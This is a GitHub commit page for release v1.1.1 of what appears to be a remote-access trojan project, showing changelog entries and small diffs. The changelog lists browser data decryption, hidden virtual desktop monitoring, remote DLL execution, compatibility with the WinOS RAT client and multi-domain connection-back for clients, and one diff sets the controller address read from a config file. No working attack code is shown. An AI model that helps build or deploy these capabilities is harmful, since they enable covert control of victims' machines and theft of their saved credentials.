Skip to content

Commit 0cce6e7

Browse files
committed
Release v1.1.1
1 parent 0f7b684 commit 0cce6e7

21 files changed

+4625
-4566
lines changed

ReadMe.md

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -234,6 +234,26 @@
234234
- 新增特性:支持虚拟远程桌面监控;
235235
- 新增命令:支持执行代码(64位 DLL)。
236236

237+
**2025.06.21**
238+
239+
发布 v1.1.1:
240+
241+
*自该版本开始,主控程序需要授权,并且会自动连接到授权服务器,您可以联系作者请求授权。
242+
如果对这个有意见,请使用早期版本(<v1.0.8)。自行修改和编译程序,也可以解决该问题。*
243+
244+
- 修复:远程桌面算法不生效的问题
245+
- 新增:添加用于操作在线客户端的菜单项
246+
- 插件:新增远程聊天功能
247+
- 插件:新增浏览器数据解密功能
248+
- 插件:新增主机管理功能
249+
- 插件:新增虚拟桌面功能
250+
- 改进:#48 文件管理对话框支持排序
251+
- 新功能:主控支持 WinOS(银狐) 远控客户端(RAT)
252+
- 改进授权逻辑:支持在线授权主控端
253+
- 新功能:支持随机或多路连接,即多个域名随机上线或并发上线
254+
- 改进:新增弹窗以显示主机的详细信息
255+
- 改进客户端稳定性
256+
237257
---
238258

239259
# 6.其他项目 <a id="6-other-projects"></a>

ReadMe_EN.md

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -247,6 +247,29 @@ Release v1.1.0:
247247
* feat: Support virtual remote desktop monitoring
248248
* feature: Add command to execute DLL
249249

250+
**2025.06.21**
251+
252+
Release v1.1.1:
253+
254+
*Starting from this version, the controller program requires authorization and
255+
will automatically connect to the authorization server.
256+
You may contact the author to request authorization. If you have concerns about this,
257+
please use an earlier version (prior to v1.0.8).
258+
Modifying and compiling the program yourself can also resolve this issue.*
259+
260+
* fix: remote desktop algorithm doesn't take effort
261+
* Add some menus for operating online client
262+
* Plugin: Add remote chat feature
263+
* Plugin: Add browser decryption feature
264+
* Plugin: Add host management feature
265+
* Plugin: Add virtual desktop feature
266+
* Improve: #48 Support sorting in file management dialog
267+
* Feature: Support WinOS RAT client
268+
* Improve authorization logic: Support authorize master online
269+
* feature: Support random or multi connection
270+
* Improvement: Add a popup window to show details
271+
* Improve client stability
272+
250273
---
251274

252275
# 6. Related Projects
3.39 MB
Binary file not shown.
829 KB
Binary file not shown.
788 KB
Binary file not shown.
2.99 MB
Binary file not shown.

Releases/v1.1.1/Yama.exe

14.7 MB
Binary file not shown.

client/SCLoader.cpp

Lines changed: 4519 additions & 4519 deletions
Large diffs are not rendered by default.

client/Script.rc

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -88,7 +88,7 @@ IDR_WAVE WAVE "Res\\msg.wav"
8888
//
8989

9090
VS_VERSION_INFO VERSIONINFO
91-
FILEVERSION 1,0,1,0
91+
FILEVERSION 1,0,1,1
9292
PRODUCTVERSION 1,0,0,1
9393
FILEFLAGSMASK 0x3fL
9494
#ifdef _DEBUG
@@ -106,7 +106,7 @@ BEGIN
106106
BEGIN
107107
VALUE "CompanyName", "FUCK THE UNIVERSE"
108108
VALUE "FileDescription", "A GHOST"
109-
VALUE "FileVersion", "1.0.1.0"
109+
VALUE "FileVersion", "1.0.1.1"
110110
VALUE "InternalName", "ServerDll.dll"
111111
VALUE "LegalCopyright", "Copyright (C) 2019-2025"
112112
VALUE "OriginalFilename", "ServerDll.dll"

client/test.cpp

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -382,7 +382,7 @@ BOOL Run(const char* argv1, int argv2) {
382382
port = argv2;
383383
}
384384
else {
385-
GetPrivateProfileStringA("settings", "localIp", g_ConnectAddress.ServerIP(), ip, _MAX_PATH, path);
385+
GetPrivateProfileStringA("settings", "master", g_ConnectAddress.ServerIP(), ip, _MAX_PATH, path);
386386
port = GetPrivateProfileIntA("settings", "ghost", g_ConnectAddress.ServerPort(), path);
387387
}
388388
Mprintf("[server] %s:%d\n", ip, port);

0 commit comments

Comments
 (0)